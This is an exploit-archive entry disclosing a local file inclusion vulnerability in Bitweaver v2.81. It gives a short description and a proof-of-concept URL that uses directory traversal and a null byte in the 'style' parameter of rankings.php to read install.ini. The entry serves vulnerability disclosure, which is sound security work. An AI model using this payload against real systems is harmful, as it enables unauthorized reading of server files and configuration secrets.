Bitweaver v2.81 Local File Inclusion Vulnerability
| EKU-ID: 1549 | CVE: | OSVDB-ID: |
| Author: I2sec-PJH | Published: 2012-02-28 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 1549 | CVE: | OSVDB-ID: |
| Author: I2sec-PJH | Published: 2012-02-28 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Bitweaver v2.81 LFI exploit
# Date: 27.02.2012
# Author: I2sec-PJH
# Software Link: http://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download
# Version: v2.81
# Tested on: windows xp
------------------------------------------------------
-Description
LFI vulnerability in version 2.81 is available
ini files can be read when entering and various other extension produces spit tpl files.
-PoC
http://localhost/wiki/rankings.php?style=../../../../../../../../install.ini%00